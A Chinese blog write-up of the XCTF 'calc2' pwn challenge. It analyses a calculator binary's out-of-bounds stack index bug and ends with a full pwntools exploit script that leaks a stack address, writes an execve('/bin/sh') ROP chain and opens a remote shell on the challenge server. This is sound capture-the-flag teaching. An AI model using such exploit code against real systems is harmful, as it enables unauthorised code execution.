攻防世界PWN之calc2题解

最新推荐文章于 2023-05-06 00:08:28 发布
最新推荐文章于 2023-05-06 00:08:28 发布
阅读量1k 收藏
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103517704
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

calc2

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/shgetshell

发现,该程序是一个四则运算表达式计算程序

其中,我们需要重点关注的就是a2[v4+1] = v9这句代码,可能造成下标越界。

我们仔细分析程序,然后用C语言还原这个计算过程

  1. #include <stdio.h>  
  2. #include <string.h>  
  3. #include <stdlib.h>  
  4.   
  5. //  
  6. struct Stack {  
  7.     int top;  
  8.     int data[100];  
  9. };  
  10.   
  11.   
  12. void eval(Stack *num_stack,char op) {  
  13.     switch (op) {  
  14.         case '+':  
  15.             num_stack->data[num_stack->top - 1] += num_stack->data[num_stack->top];  
  16.             break;  
  17.         case '-':  
  18.             num_stack->data[num_stack->top - 1] -= num_stack->data[num_stack->top];  
  19.             break;  
  20.         case '*':  
  21.             num_stack->data[num_stack->top - 1] *= num_stack->data[num_stack->top];  
  22.             break;  
  23.         case '/':  
  24.             num_stack->data[num_stack->top - 1] /= num_stack->data[num_stack->top];  
  25.             break;  
  26.     }  
  27.     //出栈一个无用数据  
  28.     num_stack->top--;  
  29. }  
  30.   
  31. int parse_expr(char *in,Stack *num_stack) {  
  32.     //存放运算符的栈  
  33.     Stack op_stack;  
  34.     memset(&op_stack,0,sizeof(Stack));  
  35.     char *p = in;  
  36.     for (int i=0;; ++i) {  
  37.         char ch = in[i];  
  38.         //遇到非数字,判定为运算符  
  39.         if ( unsigned(ch - '0') > 9) {  
  40.             int len = i + in - p;  
  41.             char *tmp = (char *)malloc(len+1);  
  42.             memcpy(tmp,p,len);  
  43.             tmp[len] = '\0';  
  44.             if ( !strcmp(tmp, "0") ) {  
  45.                 puts("prevent division by zero");  
  46.                 fflush(stdout);  
  47.                 return 0;  
  48.             }  
  49.             int x = atoi(tmp);  
  50.             //操作数入栈  
  51.             if (x > 0) {  
  52.                 num_stack->top++;  
  53.                 num_stack->data[num_stack->top] = x;  
  54.             }  
  55.   
  56.             //表达式错误,不能有连续的多个运算符  
  57.             if (ch && in[i+1] - '0' > 9) {  
  58.                 puts("expression error!");  
  59.                 fflush(stdout);  
  60.                 return 0;  
  61.             }  
  62.             p = in + i + 1;  
  63.             //查看栈顶运算符  
  64.             char op =  op_stack.data[op_stack.top];  
  65.             if (op) {  
  66.                 //与当前运算符做比较  
  67.                 switch (ch) {  
  68.                     case '%':  
  69.                     case '*':  
  70.                     case '/':  
  71.                         if ( op != '+' && op != '-' ) {  
  72.                             eval(num_stack, op);  
  73.                             op_stack.data[op_stack.top] = ch;  
  74.                         } else {  
  75.                             op_stack.data[++op_stack.top] = ch;  
  76.                         }  
  77.                         break;  
  78.                     case '+':  
  79.                     case '-':  
  80.                         eval(num_stack, op);  
  81.                         op_stack.data[op_stack.top] = ch;  
  82.                         break;  
  83.                     default:  
  84.                         eval(num_stack, op_stack.data[op_stack.top--]);  
  85.                         break;  
  86.                 }  
  87.             } else {  
  88.                 op_stack.data[op_stack.top] = ch;  
  89.             }  
  90.             if (!ch) {  
  91.                 break;  
  92.             }  
  93.         }  
  94.     }  
  95.     while (op_stack.top >= 0) {  
  96.         eval(num_stack, op_stack.data[op_stack.top--]);  
  97.     }  
  98.     return 1;  
  99. }  
  100.   
  101. int main() {  
  102.     //存放操作数的栈  
  103.     Stack num_stack;  
  104.     num_stack.top = -1;  
  105.     memset(num_stack.data,0,sizeof(int) * 100);  
  106.     char expr[0x400] = {0};  
  107.     while (true) {  
  108.         scanf("%s",expr);  
  109.         if (parse_expr(expr,&num_stack)) {  
  110.             printf("%d\n",num_stack.data[num_stack.top]);  
  111.             fflush(stdout);  
  112.         }  
  113.     }  
  114. }  

再对比IDA,中,我们要是能修改到a2,也就是top指针,那么就能实现任意地址写

再看看这个程序的逻辑,结合我们还原的源代码,能够修改到top的值的关键地方在eval函数

结合源代码,我们看看

如果当num_stack->top0时,就可以造成data数据下标越界,什么时候num_stack->top为0呢?不就是num_stack里只有一个操作数的时候吗。如果,我们输入的表达式为+123,那么,由于该程序判断时的缺陷,表达式的结尾的\0也被当做符号处理,因此,程序先是遇到+号,+号入运算符栈,然后程序遇到123,入num_stack,接下来,程序遇到\0结尾符,于是会调用eval函数,而此时num_stack->top = 0,导致了num_stack->data[-1] += num_stack[num_stack->top],使得num_stack的top变成了123 + 1 = 124,接下来,结尾处又执行了,综上,+123这个表达式使得num_stacktop变成了123。为了便于观察,我们可以加入这样的代码

然后,我们输入+123+456

由此,我们可以用IDA调试,找到calc函数的返回地址的栈位置,便可以修改calc的返回地址,构造ROP。为了构造ROP,我们需要一些gadget,我们可以使用ROPgadgets工具来查找ROPgadget --binary calc2  --only 'pop|ret' | grep 'eax'

  1. #pop eax ; ret  
  2. pop_eax = 0x0805c34b  
  3. #pop ebx ; ret  
  4. pop_ebx = 0x080481d1  
  5. #pop ecx ; pop ebx ; ret  
  6. pop_ecx = 0x080701d1  
  7. #pop edx ; ret  
  8. pop_edx = 0x080701aa  
  9. #int 0x80  
  10. int_80 = 0x08049a21  
  11.   
  12. #通过系统调用来执行/bin/sh  
  13. rop = [pop_eax,0x0b,  
  14.        pop_ecx,0,0,  
  15.        pop_edx,0,  
  16.        int_80,  
  17.        u32('/bin'),  
  18.        u32('/sh\x00')]  

为了得到/bin/sh字符串的地址,我们把/bin/sh到时候存到栈里,然后,我们需要泄露一些栈地址,就能得到/bin/sh字符串地址

我们可以借助输出结果的地方来泄露地址

其中,v1正是num_stack的栈顶指针,v2num_stack的数据区

之前我们知道了,+123,可以使得num_stack的栈顶指针变为123,那么就能泄露偏移123*4字节处的数据,那么要泄露栈地址,我们只需算出main的ebp的偏移,即可泄露

我们看到,当前存放main的ebp的栈地址为0xFFFEA1C8

而v2的地址为0xFFFE9C2C,计算一下(0xFFFEA1C8 - 0xFFFE9C2C) / 4 = 0x167

也就是359,因此,我们只需要输入+360再回车,即可泄露出main函数的ebp,然后,就能计算出/bin/sh字符串在栈里的地址,需要注意的是,泄露出来的数据是负数,因为%d处理的是有符号数,因此,我们只需用0x100000000 + x即可得到原来的数据

  1. sh.recvuntil('\n')  
  2. #泄露mainebp  
  3. sh.sendline('+360')  
  4. #由于泄露出来是一个负数的形式,因此我们将其加上0x100000000即可  
  5. main_ebp = int(sh.recvuntil('\n',drop=True))  
  6. main_ebp = 0x100000000 + main_ebp  
  7. #获得/bin/sh字符串在栈里的位置  
  8. rop[4] = main_ebp - 0x20 + 9 * 4  
  9. print hex(main_ebp)  

现在,我们得到了地址,然后就构造好了ROP链,我们需要依次把ROP链写入到calc的返回地址的栈后面

经过一顿测试,发现,我们不能靠这里来写ROP,因为后续用调用了eval函数,对数据又做了修改吗,因此,我们应该依靠eval函数,因为eval函数里对a1数组做了最后的修改。

eval函数

由于是a1[top-1] += a1[top],因此,本来,我们走360开始就是calc函数的返回地址处,我们向后偏移1,也就是从361开始,这样,不会影响前面的canary值。并且,由于使用的是+=,我们需要先泄露原来a1[top]处的数据,再算出差值,然后提交

  1. #开始写360处就是parse_expr的返回地址,我们写ROP  
  2. for i in range(0,len(rop)):  
  3.    payload = '+' + str(361 + i)  
  4.    sh.sendline(payload)  
  5.    #先泄露原来的值  
  6.    num = int(sh.recvuntil('\n',drop=True))  
  7.    #计算出差值  
  8.    offset = rop[i] - num  
  9.    print hex(rop[i])  
  10.    #如果小于零,我们需要去掉+号,直接使用数字前面的负号  
  11.    if offset<0:  
  12.       payload_ = payload + str(offset)  
  13.    else:  
  14.       payload_ = payload + '+' + str(offset)  
  15.    #发送数据  
  16.    sh.sendline(payload_)  
  17.    #我们还需检验一下是否正确的写入了对的数据  
  18.    value = int(sh.recv(1024))  
  19.    if value < 0:  
  20.       #转为原始数据  
  21.       value += 0x100000000  
  22.    while value!=rop[i]:  
  23.       print "current value is %x" % (value)  
  24.       offset = rop[i] - value  
  25.       if offset<0:  
  26.          sh.sendline(payload + str(offset))  
  27.       else:  
  28.          sh.sendline(payload + '+' + str(offset))  
  29.       value = int(sh.recv(1024))  
  30.       if value < 0:  
  31.          value += 0x100000000  

这样操作以后,ROP写入成功,接下来,我们发送一个非数字和运算符,使得程序退出calc函数,执行ROP链。

  1. #getshell  
  2. sh.sendline('a')  

本题的难点在于找到漏洞,以及分析漏洞,需要一定的时间。

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. #pop eax ; ret  
  5. pop_eax = 0x0805c34b  
  6. #pop ebx ; ret  
  7. pop_ebx = 0x080481d1  
  8. #pop ecx ; pop ebx ; ret  
  9. pop_ecx = 0x080701d1  
  10. #pop edx ; ret  
  11. pop_edx = 0x080701aa  
  12. #int 0x80  
  13. int_80 = 0x08049a21  
  14.   
  15. #通过系统调用来执行/bin/sh  
  16. rop = [pop_eax,0x0b,  
  17.        pop_ecx,0,0,  
  18.        pop_edx,0,  
  19.        int_80,  
  20.        u32('/bin'),  
  21.        u32('/sh\x00')]  
  22.   
  23. #sh = process('./pwnh37')  
  24. sh = remote('111.198.29.45',39005)  
  25. sh.recvuntil('\n')  
  26. #泄露mainebp  
  27. sh.sendline('+360')  
  28. #由于泄露出来是一个负数的形式,因此我们将其加上0x100000000即可  
  29. main_ebp = int(sh.recvuntil('\n',drop=True))  
  30. main_ebp = 0x100000000 + main_ebp  
  31. #获得/bin/sh字符串在栈里的位置  
  32. rop[4] = main_ebp - 0x20 + 9 * 4  
  33. print hex(main_ebp)  
  34.   
  35. #开始写360处就是parse_expr的返回地址,我们写ROP  
  36. for i in range(0,len(rop)):  
  37.    payload = '+' + str(361 + i)  
  38.    sh.sendline(payload)  
  39.    #先泄露原来的值  
  40.    num = int(sh.recvuntil('\n',drop=True))  
  41.    #计算出差值  
  42.    offset = rop[i] - num  
  43.    print hex(rop[i])  
  44.    #如果小于零,我们需要去掉+号,直接使用数字前面的负号  
  45.    if offset<0:  
  46.       payload_ = payload + str(offset)  
  47.    else:  
  48.       payload_ = payload + '+' + str(offset)  
  49.    #发送数据  
  50.    sh.sendline(payload_)  
  51.    #我们还需检验一下是否正确的写入了对的数据  
  52.    value = int(sh.recv(1024))  
  53.    if value < 0:  
  54.       #转为原始数据  
  55.       value += 0x100000000  
  56.    while value!=rop[i]:  
  57.       print "current value is %x" % (value)  
  58.       offset = rop[i] - value  
  59.       if offset<0:  
  60.          sh.sendline(payload + str(offset))  
  61.       else:  
  62.          sh.sendline(payload + '+' + str(offset))  
  63.       value = int(sh.recv(1024))  
  64.       if value < 0:  
  65.          value += 0x100000000  
  66.   
  67. #getshell  
  68. sh.sendline('a')  
  69.   
  70. sh.interactive() 
ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界PWN题解
liucc09的博客
12-03 850
level3 程序分析 通过ida打开程序,F5键生成C的代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; } ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1,
[RoarCTF 2019]Easy Calc攻防世界 ics07、[极客大挑战 2019]EasySQL
weixin_52268949的博客
04-22 657
利用点就在上面这串代码中,这里先把文件名拼接到backup目录下,然后正则匹配,这里正则的意思是:匹配最后一个点后面的后缀,然后下面的else里面又更改了当前目录。然后通过POST方式写入con和file,一个为文件内容一个为文件路径,又因为有正则匹配的过滤,我们将文件名取名为5.php/.,又因为这是Linux操作系统所以可以解析那么接下来我们上传文件即可。通过这段代码发现只需要result有值我们就可以上传文件了,一开始我的思路是通过sql注入完成但是失败了,这时候我们看一下sql查询的条件。
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1490
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 295
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
PwnTheBox--快速计算
Dream'
03-01 991
一、问题描述 打开题目之后,要求3秒之内计算一个式子,我们过三秒再刷新发现式子就发生了变化,这道题手算是不太可能了,考虑别的方法。 二、解决问题 使用python解决问题的大概思路如下: (1)先创建一个session对象。(因为计算出结果后需要再次发送数据,而session对象可以保留会话,第二次发送时带上第一次时的消息头) s = requests.Session() (2)使用session对象访问题目地址,并从中提取出需要计算的表达式。 r = s.get('http://11
[BUUCTFpwn] noxctf2018_the_name_calculator
weixin_52640415的博客
12-31 437
printf格式化字符串漏洞 漏洞点: main中读name有溢出,覆盖到v4可以进入下一步 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[28]; // [esp+Ch] [ebp-2Ch] BYREF int v4; // [esp+28h] [ebp-10h] unsigned int v5; // [esp+2Ch] [ebp-Ch] v5 = _
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
pwn07.ret2syscall例题
11-11
ret2syscall例题
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
入门pwn题目ret2text
03-26
入门pwn题目ret2text
攻防世界supermarket
qq_44370676的博客
08-25 357
首先检查保护机制 然后运行一下 是一个菜单题,接着往下看 可以看到,选项3会按行打印出每个商品的信息,在des.后面就是商品的description 接着IDA分析 首先看看sub_8048864() sub_8048812就是读入一串字符串到nptr,这一块并没有溢出点,但是这里并不是以%d的方式输入数字,而是先输入字符串然后用atoi函数转换,如果能够修改atoi的got表为system并且输入/bin/sh那么我们的目的便达成了。接着往下看,看能不能实现这.
BUUCTF:[RoarCTF 2019]Easy Calc
末初的CSDN博客
10-19 1169
题目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc 查看源码 抓包发现calc.php 访问http://node3.buuoj.cn:28908/calc.php 很明显,代码执行绕过,前面源码也说了有WAF,这里绕过WAF有两种方法 在num前添加%20绕过对num的检测 HTTP走私之重复Content-Length绕过 首先看下phpinfo(),禁用了一大堆函数 使用scandir()函数+chr()函数绕过.
uaf-逻辑题-攻防世界 supermarket
csdn546229768的博客
11-30 373
刚开始我也被这题绕晕了,做这种题要画图画图!!!不然很容易做着做着忘了自己做到哪里来了 本题环境是ubuntu16、glib2.23!!!我第一次做的时候用的ubuntu18也就是glib2.27这时有tcache freechunk的分配策略不一样死活跑不出来,这题我还要研究一下tcache版本的。 首先申请了一个不在fastbin范围(0x10~0x58)的chunk0,然后再申请一个随便大小的chunk1,解释:因为下面我将要用remalloc重新分配chun0,remalloc如果重新分配的ch
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1379
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
攻防世界PWN之Supermarket题解
seaaseesa的博客
11-15 2259
Supermarket 首先,看一下程序的保护机制。看起来还不错 然后,我们用IDA分析一下 分析出程序大概有这样的一个结构体 typedefstructNode{ charname[16]; intprice; intdescription_size; char*description; }Node;...
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1279
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP的
安恒六月赛DASCTF(web1,2)
weixin_43610673的博客
06-26 1615
简单的计算题-1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from flask import Flask, render_template, request,session from config import black_list,create import os app = Flask(__name__) app.config['SECRET_KEY'] = os.urandom(24) ## flag is in /flag try to ge
CTF--BUUCTF-WEB-EasySQL+Easy Calc
qq_42404383的博客
01-13 1428
CTF–BUUCTF-WEB-EasySQL+Easy Calc 一、[极客大挑战 2019]EasySQL ​ 题目如图: 简单的注入一下: 把密码长度加长一些试试: 二、Easy Calc–简单的计算器 题目: 分析: 提示有WAF、拿节点content的值去后台运算 解题: 上面行不通、要从WAF着手了(我是不会了) 换个思路、题目还是得做–>> 搜达寺内、...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值